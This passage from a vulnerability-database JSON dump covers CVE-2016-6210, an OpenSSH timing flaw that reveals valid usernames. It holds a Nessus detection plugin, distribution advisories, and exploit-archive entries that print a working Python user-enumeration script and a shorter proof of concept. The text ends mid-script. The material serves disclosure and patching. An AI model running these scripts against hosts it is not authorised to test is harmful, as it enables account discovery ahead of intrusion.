:\n\nSUSE Linux Enterprise Server for SAP 12:zypper in -t patch\nSUSE-SLE-SAP-12-2016-1332=1\n\nSUSE Linux Enterprise Server 12-SP1:zypper in -t patch\nSUSE-SLE-SERVER-12-SP1-2016-1332=1\n\nSUSE Linux Enterprise Server 12-LTSS:zypper in -t patch\nSUSE-SLE-SERVER-12-2016-1332=1\n\nSUSE Linux Enterprise Desktop 12-SP1:zypper in -t patch\nSUSE-SLE-DESKTOP-12-SP1-2016-1332=1\n\nTo bring your system up-to-date, use 'zypper patch'.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-askpass-gnome-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-fips\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:openssh-helpers-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:12\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/08/07\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2016/09/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/09/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLED12|SLES12)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLED12 / SLES12\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES12\" && (! preg(pattern:\"^(0|1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES12 SP0/1\", os_ver + \" SP\" + sp);\nif (os_ver == \"SLED12\" && (! 
preg(pattern:\"^(1)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLED12 SP1\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-askpass-gnome-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-askpass-gnome-debuginfo-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-debuginfo-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-debugsource-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-fips-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-helpers-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"1\", reference:\"openssh-helpers-debuginfo-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-askpass-gnome-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-askpass-gnome-debuginfo-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-debuginfo-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-debugsource-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-fips-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-helpers-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLES12\", sp:\"0\", reference:\"openssh-helpers-debuginfo-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"openssh-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"openssh-askpass-gnome-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", 
reference:\"openssh-askpass-gnome-debuginfo-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"openssh-debuginfo-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"openssh-debugsource-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"openssh-helpers-6.6p1-52.1\")) flag++;\nif (rpm_check(release:\"SLED12\", sp:\"1\", cpu:\"x86_64\", reference:\"openssh-helpers-debuginfo-6.6p1-52.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"openssh\");\n}\n", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "centos": [{"lastseen": "2020-12-08T03:34:08", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6210"], "description": "**CentOS Errata and Security Advisory** CESA-2017:2563\n\n\nOpenSSH is an SSH protocol implementation supported by a number of Linux, UNIX, and similar operating systems. It includes the core files necessary for both the OpenSSH client and server.\n\nSecurity Fix(es):\n\n* A covert timing channel flaw was found in the way OpenSSH handled authentication of non-existent users. A remote unauthenticated attacker could possibly use this flaw to determine valid user names by measuring the timing of server responses. 
(CVE-2016-6210)\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2017-August/034567.html\n\n**Affected packages:**\nopenssh\nopenssh-askpass\nopenssh-clients\nopenssh-ldap\nopenssh-server\npam_ssh_agent_auth\n\n**Upstream details at:**\n", "edition": 4, "modified": "2017-08-31T18:50:28", "published": "2017-08-31T18:50:28", "href": "http://lists.centos.org/pipermail/centos-announce/2017-August/034567.html", "id": "CESA-2017:2563", "title": "openssh, pam_ssh_agent_auth security update", "type": "centos", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2019-12-20T18:28:36", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10708", "CVE-2016-10011", "CVE-2016-10009", "CVE-2016-6515", "CVE-2016-6210", "CVE-2016-10012"], "description": "**CentOS Errata and Security Advisory** CESA-2017:2029\n\n\nOpenSSH is an SSH protocol implementation supported by a number of Linux, UNIX, and similar operating systems. It includes the core files necessary for both the OpenSSH client and server.\n\nThe following packages have been upgraded to a later upstream version: openssh (7.4p1). (BZ#1341754)\n\nSecurity Fix(es):\n\n* A covert timing channel flaw was found in the way OpenSSH handled authentication of non-existent users. A remote unauthenticated attacker could possibly use this flaw to determine valid user names by measuring the timing of server responses. (CVE-2016-6210)\n\n* It was found that OpenSSH did not limit password lengths for password authentication. A remote unauthenticated attacker could use this flaw to temporarily trigger high CPU consumption in sshd by sending long passwords. (CVE-2016-6515)\n\n* It was found that ssh-agent could load PKCS#11 modules from arbitrary paths. 
An attacker having control of the forwarded agent-socket on the server, and the ability to write to the filesystem of the client host, could use this flaw to execute arbitrary code with the privileges of the user running ssh-agent. (CVE-2016-10009)\n\n* It was found that the host private key material could possibly leak to the privilege-separated child processes via re-allocated memory. An attacker able to compromise the privilege-separated process could therefore obtain the leaked key information. (CVE-2016-10011)\n\n* It was found that the boundary checks in the code implementing support for pre-authentication compression could have been optimized out by certain compilers. An attacker able to compromise the privilege-separated process could possibly use this flaw for further attacks against the privileged monitor process. (CVE-2016-10012)\n\nAdditional Changes:\n\nFor detailed information on changes in this release, see the Red Hat Enterprise Linux 7.4 Release Notes linked from the References section.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2017-August/004417.html\n\n**Affected packages:**\nopenssh\nopenssh-askpass\nopenssh-cavs\nopenssh-clients\nopenssh-keycat\nopenssh-ldap\nopenssh-server\nopenssh-server-sysvinit\npam_ssh_agent_auth\n\n**Upstream details at:**\n", "edition": 6, "modified": "2017-08-24T01:40:16", "published": "2017-08-24T01:40:16", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2017-August/004417.html", "id": "CESA-2017:2029", "title": "openssh, pam_ssh_agent_auth security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:29", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6210"], "description": "[5.3p1-123]\n- Fix for CVE-2016-6210: User enumeration via covert timing channel (#1357442)", "edition": 4, "modified": "2017-08-31T00:00:00", "published": "2017-08-31T00:00:00", "id": 
"ELSA-2017-2563", "href": "http://linux.oracle.com/errata/ELSA-2017-2563.html", "title": "openssh security update", "type": "oraclelinux", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-10-22T17:13:45", "bulletinFamily": "unix", "cvelist": ["CVE-2016-10011", "CVE-2016-10009", "CVE-2016-6515", "CVE-2016-6210", "CVE-2016-10012"], "description": "[7.4p1-11 + 0.10.3-1]\n- Compiler warnings (#1341754)\n[7.4p1-10 + 0.10.3-1]\n- Add missing messages in FIPS mode (#1341754)\n[7.4p1-9 + 0.10.3-1]\n- Allow harmless syscalls for s390 crypto modules (#1451809)\n[7.4p1-8 + 0.10.3-1]\n- Fix multilib issue in documentation (#1450361)\n[7.4p1-6 + 0.10.3-1]\n- ControlPath too long should not be a fatal error (#1447561)\n[7.4p1-5 + 0.10.3-1]\n- Fix the default key exchange proposal in FIPS mode (#1438414)\n- Remove another wrong coverity chunk to unbreak gsskex (#1438414)\n[7.4p1-4 + 0.10.3-1]\n- Update seccomp filter to work on ppc64le (#1443916)\n[7.4p1-3 + 0.10.3-1]\n- Do not completely disable SHA-1 key exchange methods in FIPS (#1324493)\n- Remove wrong coverity patches\n[7.4p1-2 + 0.10.3-1]\n- Fix coverity scan results\n- Adjust FIPS algorithms list (#1420910)\n- Revert problematic feature for chroot(#1418062)\n- Fix CBC weakness in released OpenSSH 7.5\n[7.4p1-1 + 0.10.3-1]\n- Rebase to openssh 7.4 and pam_ssh_agent_auth 0.10.3 (#1341754)\n- detach -cavs subpackage\n- enable seccomp filter for sandboxed child", "edition": 5, "modified": "2017-08-07T00:00:00", "published": "2017-08-07T00:00:00", "id": "ELSA-2017-2029", "href": "http://linux.oracle.com/errata/ELSA-2017-2029.html", "title": "openssh security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}], "exploitpack": [{"lastseen": "2020-04-01T19:04:39", "description": "\nOpenSSH 7.2p2 - Username Enumeration", "edition": 1, "published": "2016-07-20T00:00:00", "title": "OpenSSH 7.2p2 - Username Enumeration", "type": 
"exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6210"], "modified": "2016-07-20T00:00:00", "id": "EXPLOITPACK:802AF3229492E147A5F09C7F2B27C6DF", "href": "", "sourceData": "#!/usr/bin/python\n#\n# CVEs: CVE-2016-6210 (Credits for this go to Eddie Harari)\n#\n# Author: 0_o -- null_null\n# nu11.nu11 [at] yahoo.com\n# Oh, and it is n-u-one-one.n-u-one-one, no l's...\n# Wonder how the guys at packet storm could get this wrong :(\n# \n# Date: 2016-07-19\n# \n# Purpose: User name enumeration against SSH daemons affected by CVE-2016-6210. \n# \n# Prerequisites: Network access to the SSH daemon.\n#\n# DISCLAIMER: Use against your own hosts only! Attacking stuff you are not \n# permitted to may put you in big trouble!\n#\n# And now - the fun part :-)\n# \n\n\nimport paramiko\nimport time\nimport numpy\nimport argparse\nimport sys\n\nargs = None\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\n\ndef get_args():\n parser = argparse.ArgumentParser()\n group = parser.add_mutually_exclusive_group()\n parser.add_argument(\"host\", type = str, help = \"Give SSH server address like ip:port or just by ip\")\n group.add_argument(\"-u\", \"--user\", type = str, help = \"Give a single user name\")\n group.add_argument(\"-U\", \"--userlist\", type = str, help = \"Give a file containing a list of users\")\n parser.add_argument(\"-e\", \"--enumerated\", action = \"store_true\", help = \"Only show enumerated users\")\n parser.add_argument(\"-s\", \"--silent\", action = \"store_true\", help = \"Like -e, but just the user names will be written to stdout (no banner, no anything)\")\n parser.add_argument(\"--bytes\", default = 50000, type = int, help = \"Send so many BYTES to the SSH daemon as a password\")\n parser.add_argument(\"--samples\", default = 12, type = int, help = \"Collect so many SAMPLES to calculate a timing 
baseline for authenticating non-existing users\")\n parser.add_argument(\"--factor\", default = 3.0, type = float, help = \"Used to compute the upper timing boundary for user enumeration\")\n parser.add_argument(\"--trials\", default = 1, type = int, help = \"try to authenticate user X for TRIALS times and compare the mean of auth timings against the timing boundary\")\n args = parser.parse_args()\n return args\n\n\ndef get_banner(host, port):\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n try:\n ssh.connect(hostname = host, port = port, username = 'invalidinvalidinvalid', password = 'invalidinvalidinvalid')\n except:\n banner = ssh.get_transport().remote_version\n ssh.close()\n return banner\n\n\ndef connect(host, port, user):\n global args\n starttime = 0.0\n endtime = 0.0\n p = 'B' * int(args.bytes)\n ssh = paramiko.SSHClient()\n ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\n starttime=time.clock()\n try:\n ssh.connect(hostname = host, port = port, username = user, password = p, look_for_keys = False, gss_auth = False, gss_kex = False, gss_deleg_creds = False, gss_host = None, allow_agent = False)\n except:\n endtime=time.clock()\n finally:\n ssh.close()\n return endtime - starttime\n\n\n\ndef main():\n global args\n args = get_args()\n if not args.silent: print(\"\\n\\nUser name enumeration against SSH daemons affected by CVE-2016-6210\")\n if not args.silent: print(\"Created and coded by 0_o (nu11.nu11 [at] yahoo.com), PoC by Eddie Harari\\n\\n\")\n if args.host:\n host = args.host.split(\":\")[0]\n try:\n port = int(args.host.split(\":\")[1])\n except IndexError:\n port = 22\n users = []\n if args.user:\n users.append(args.user)\n elif args.userlist:\n with open(args.userlist, \"r\") as f:\n users = f.readlines()\n else:\n if not args.silent: print(bcolors.FAIL + \"[!] 
\" + bcolors.ENDC + \"You must give a user or a list of users\")\n sys.exit()\n if not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Testing SSHD at: \" + bcolors.BOLD + str(host) + \":\" + str(port) + bcolors.ENDC + \", Banner: \" + bcolors.BOLD + get_banner(host, port) + bcolors.ENDC)\n # get baseline timing for non-existing users...\n baseline_samples = []\n baseline_mean = 0.0\n baseline_deviation = 0.0\n if not args.silent: sys.stdout.write(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Getting baseline timing for authenticating non-existing users\")\n for i in range(1, int(args.samples) + 1):\n if not args.silent: sys.stdout.write('.')\n if not args.silent: sys.stdout.flush()\n sample = connect(host, port, 'foobar-bleh-nonsense' + str(i))\n baseline_samples.append(sample)\n if not args.silent: sys.stdout.write('\\n')\n # remove the biggest and smallest value\n baseline_samples.sort()\n baseline_samples.pop()\n baseline_samples.reverse()\n baseline_samples.pop()\n # do math\n baseline_mean = numpy.mean(numpy.array(baseline_samples))\n baseline_deviation = numpy.std(numpy.array(baseline_samples))\n if not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Baseline mean for host \" + host + \" is \" + str(baseline_mean) + \" seconds.\")\n if not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Baseline variation for host \" + host + \" is \" + str(baseline_deviation) + \" seconds.\")\n upper = baseline_mean + float(args.factor) * baseline_deviation\n if not args.silent: print(bcolors.WARNING + \"[*] \" + bcolors.ENDC + \"Defining timing of x < \" + str(upper) + \" as non-existing user.\")\n if not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Testing your users...\")\n # \n # Get timing for the given user name...\n #\n for u in users:\n user = u.strip()\n enum_samples = []\n enum_mean = 0.0\n for t in range(0, int(args.trials)):\n timeval = connect(host, port, user)\n enum_samples.append(timeval)\n 
enum_mean = numpy.mean(numpy.array(enum_samples))\n if (enum_mean < upper):\n if not (args.enumerated or args.silent) : \n print(bcolors.FAIL + \"[-] \" + bcolors.ENDC + user + \" - timing: \" + str(enum_mean))\n else:\n if not args.silent: \n print(bcolors.OKGREEN + \"[+] \" + bcolors.ENDC + user + \" - timing: \" + str(enum_mean))\n else: \n print(user)\n\n\n\n\nif __name__ == \"__main__\":\n main()", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2020-04-01T19:04:39", "description": "\nOpenSSHd 7.2p2 - Username Enumeration", "edition": 1, "published": "2016-07-18T00:00:00", "title": "OpenSSHd 7.2p2 - Username Enumeration", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6210"], "modified": "2016-07-18T00:00:00", "id": "EXPLOITPACK:5652DDAA7FE452E19AC0DC1CD97BA3EF", "href": "", "sourceData": "Source: http://seclists.org/fulldisclosure/2016/Jul/51\n\n--------------------------------------------------------------------\nUser Enumeration using Open SSHD (<=Latest version).\n-------------------------------------------------------------------\n\nAbstract:\n-----------\nBy sending large passwords, a remote user can enumerate users on system that runs SSHD. This problem exists in most \nmodern configuration due to the fact that it takes much longer to calculate SHA256/SHA512 hash than BLOWFISH hash.\n\nCVE-ID\n---------\nCVE-2016-6210\n\nTested versions\n--------------------\nThis issue was tested on : opensshd-7.2p2 ( should be possible on most earlier versions as well).\n\nFix\n-----------------\nThis issue was reported to OPENSSH developer group and they have sent a patch ( don't know if patch was released yet).\n(thanks to 'dtucker () zip com au' for his quick reply and fix suggestion).\n\nDetails\n----------------\nWhen SSHD tries to authenticate a non-existing user, it will pick up a fake password structure hardcoded in the SSHD \nsource code. 
On this hard coded password structure the password hash is based on BLOWFISH ($2) algorithm.\nIf real users passwords are hashed using SHA256/SHA512, then sending large passwords (10KB) will result in shorter \nresponse time from the server for non-existing users.\n\nSample code:\n----------------\nimport paramiko\nimport time\nuser=raw_input(\"user: \")\np='A'*25000\nssh = paramiko.SSHClient()\nstarttime=time.clock()\nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())\ntry:\n ssh.connect('127.0.0.1', username=user,\n password=p)\nexcept:\n endtime=time.clock()\ntotal=endtime-starttime\nprint(total)\n\n(Valid users will result in higher total time).\n\n*** please note that if SSHD configuration prohibits root login , then root is not considered as valid user...\n\n*** when TCP timestamp option is enabled the best way to measure the time would be using timestamps from the TCP \npackets of the server, since this will eliminate any network delays on the way.\n\nEddie Harari", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "paloalto": [{"lastseen": "2020-12-24T13:20:54", "bulletinFamily": "software", "cvelist": ["CVE-2016-6210"], "description": "Palo Alto Networks makes use of the OpenSSH tool. CVE-2016-6210 was recently confirmed to be applicable to the version in use by PAN-OS. 
(Ref # 100977/CVE-2016-6210).\nTo exploit this vulnerability, an attacker would have to guess usernames defined as system administrators on the firewall.\nThis issue affects PAN-OS 5.0.X and earlier; PAN-OS 5.1.X and earlier; PAN-OS 6.0.14 and earlier; PAN-OS 6.1.14 and earlier; PAN-OS 7.0.10 and earlier; PAN-OS 7.1.5 and earlier\n\n**Work around:**\nPalo Alto Networks recommends following best practices by not relying on hidden usernames and setting unique, long, and complex passwords for each of the firewall users.", "edition": 6, "modified": "2016-11-17T17:02:00", "published": "2016-11-17T17:02:00", "id": "PAN-SA-2016-0036", "href": "https://securityadvisories.paloaltonetworks.com/CVE-2016-6210", "title": "OpenSSH Vulnerability", "type": "paloalto", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "fedora": [{"lastseen": "2020-12-21T08:17:53", "bulletinFamily": "unix", "cvelist": ["CVE-2016-6210"], "description": "SSH (Secure SHell) is a program for logging into and executing commands on a remote machine. SSH is intended to replace rlogin and rsh, and to provide secure encrypted communications between two untrusted hosts over an insecure network. X11 connections and arbitrary TCP/IP ports can also be forwarded over the secure channel. OpenSSH is OpenBSD's version of the last free version of SSH, bringing it up to date in terms of security and features. This package includes the core files necessary for both the OpenSSH client and server. To make this package useful, you should also install openssh-clients, openssh-server, or both. 
", "modified": "2016-07-20T17:50:40", "published": "2016-07-20T17:50:40", "id": "FEDORA:95DA6605E7DF", "href": "", "type": "fedora", "title": "[SECURITY] Fedora 24 Update: openssh-7.2p2-10.fc24", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}], "packetstorm": [{"lastseen": "2016-12-05T22:23:29", "description": "", "published": "2016-07-18T00:00:00", "type": "packetstorm", "title": "OpenSSHD 7.2p2 User Enumeration", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6210"], "modified": "2016-07-18T00:00:00", "id": "PACKETSTORM:137942", "href": "https://packetstormsecurity.com/files/137942/OpenSSHD-7.2p2-User-Enumeration.html", "sourceData": "`-------------------------------------------------------------------- \nUser Enumeration using Open SSHD (<=Latest version). \n------------------------------------------------------------------- \n \nAbstract: \n----------- \nBy sending large passwords, a remote user can enumerate users on system that runs SSHD. This problem exists in most \nmodern configuration due to the fact that it takes much longer to calculate SHA256/SHA512 hash than BLOWFISH hash. \n \nCVE-ID \n--------- \nCVE-2016-6210 \n \nTested versions \n-------------------- \nThis issue was tested on : opensshd-7.2p2 ( should be possible on most earlier versions as well). \n \nFix \n----------------- \nThis issue was reported to OPENSSH developer group and they have sent a patch ( don't know if patch was released yet). \n(thanks to 'dtucker () zip com au' for his quick reply and fix suggestion). \n \nDetails \n---------------- \nWhen SSHD tries to authenticate a non-existing user, it will pick up a fake password structure hardcoded in the SSHD \nsource code. On this hard coded password structure the password hash is based on BLOWFISH ($2) algorithm. \nIf real users passwords are hashed using SHA256/SHA512, then sending large passwords (10KB) will result in shorter \nresponse time from the server for non-existing users. 
\n \nSample code: \n---------------- \nimport paramiko \nimport time \nuser=raw_input(\"user: \") \np='A'*25000 \nssh = paramiko.SSHClient() \nstarttime=time.clock() \nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) \ntry: \nssh.connect('127.0.0.1', username=user, \npassword=p) \nexcept: \nendtime=time.clock() \ntotal=endtime-starttime \nprint(total) \n \n(Valid users will result in higher total time). \n \n*** please note that if SSHD configuration prohibits root login , then root is not considered as valid user... \n \n*** when TCP timestamp option is enabled the best way to measure the time would be using timestamps from the TCP \npackets of the server, since this will eliminate any network delays on the way. \n \nEddie Harari \n \n \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/137942/openssh-enumerate.txt"}, {"lastseen": "2016-12-05T22:17:24", "description": "", "published": "2016-07-21T00:00:00", "type": "packetstorm", "title": "OpenSSHD 7.2p2 User Enumeration", "bulletinFamily": "exploit", "cvelist": ["CVE-2016-6210"], "modified": "2016-07-21T00:00:00", "id": "PACKETSTORM:138006", "href": "https://packetstormsecurity.com/files/138006/OpenSSHD-7.2p2-User-Enumeration.html", "sourceData": "`#!/usr/bin/python \n# \n# CVEs: CVE-2016-6210 (Credits for this go to Eddie Harari) \n# \n# Author: 0_o -- null_null \n# nu11.nu11 [at] yahoo.com \n# Oh, and it is n-u-one-one.n-u-one-one, no l's... \n# Wonder how the guys at packet storm could get this wrong :( \n# \n# Date: 2016-07-19 \n# \n# Purpose: User name enumeration against SSH daemons affected by CVE-2016-6210. \n# \n# Prerequisites: Network access to the SSH daemon. \n# \n# DISCLAIMER: Use against your own hosts only! Attacking stuff you are not \n# permitted to may put you in big trouble! 
\n# \n# And now - the fun part :-) \n# \n \n \nimport paramiko \nimport time \nimport numpy \nimport argparse \nimport sys \n \nargs = None \n \nclass bcolors: \nHEADER = '\\033[95m' \nOKBLUE = '\\033[94m' \nOKGREEN = '\\033[92m' \nWARNING = '\\033[93m' \nFAIL = '\\033[91m' \nENDC = '\\033[0m' \nBOLD = '\\033[1m' \nUNDERLINE = '\\033[4m' \n \n \ndef get_args(): \nparser = argparse.ArgumentParser() \ngroup = parser.add_mutually_exclusive_group() \nparser.add_argument(\"host\", type = str, help = \"Give SSH server address like ip:port or just by ip\") \ngroup.add_argument(\"-u\", \"--user\", type = str, help = \"Give a single user name\") \ngroup.add_argument(\"-U\", \"--userlist\", type = str, help = \"Give a file containing a list of users\") \nparser.add_argument(\"-e\", \"--enumerated\", action = \"store_true\", help = \"Only show enumerated users\") \nparser.add_argument(\"-s\", \"--silent\", action = \"store_true\", help = \"Like -e, but just the user names will be written to stdout (no banner, no anything)\") \nparser.add_argument(\"--bytes\", default = 50000, type = int, help = \"Send so many BYTES to the SSH daemon as a password\") \nparser.add_argument(\"--samples\", default = 12, type = int, help = \"Collect so many SAMPLES to calculate a timing baseline for authenticating non-existing users\") \nparser.add_argument(\"--factor\", default = 3.0, type = float, help = \"Used to compute the upper timing boundary for user enumeration\") \nparser.add_argument(\"--trials\", default = 1, type = int, help = \"try to authenticate user X for TRIALS times and compare the mean of auth timings against the timing boundary\") \nargs = parser.parse_args() \nreturn args \n \n \ndef get_banner(host, port): \nssh = paramiko.SSHClient() \nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) \ntry: \nssh.connect(hostname = host, port = port, username = 'invalidinvalidinvalid', password = 'invalidinvalidinvalid') \nexcept: \nbanner = ssh.get_transport().remote_version 
\nssh.close() \nreturn banner \n \n \ndef connect(host, port, user): \nglobal args \nstarttime = 0.0 \nendtime = 0.0 \np = 'B' * int(args.bytes) \nssh = paramiko.SSHClient() \nssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) \nstarttime=time.clock() \ntry: \nssh.connect(hostname = host, port = port, username = user, password = p, look_for_keys = False, gss_auth = False, gss_kex = False, gss_deleg_creds = False, gss_host = None, allow_agent = False) \nexcept: \nendtime=time.clock() \nfinally: \nssh.close() \nreturn endtime - starttime \n \n \n \ndef main(): \nglobal args \nargs = get_args() \nif not args.silent: print(\"\\n\\nUser name enumeration against SSH daemons affected by CVE-2016-6210\") \nif not args.silent: print(\"Created and coded by 0_o (nu11.nu11 [at] yahoo.com), PoC by Eddie Harari\\n\\n\") \nif args.host: \nhost = args.host.split(\":\")[0] \ntry: \nport = int(args.host.split(\":\")[1]) \nexcept IndexError: \nport = 22 \nusers = [] \nif args.user: \nusers.append(args.user) \nelif args.userlist: \nwith open(args.userlist, \"r\") as f: \nusers = f.readlines() \nelse: \nif not args.silent: print(bcolors.FAIL + \"[!] \" + bcolors.ENDC + \"You must give a user or a list of users\") \nsys.exit() \nif not args.silent: print(bcolors.OKBLUE + \"[*] \" + bcolors.ENDC + \"Testing SSHD at: \" + bcolors.BOLD + str(host) + \":\" + 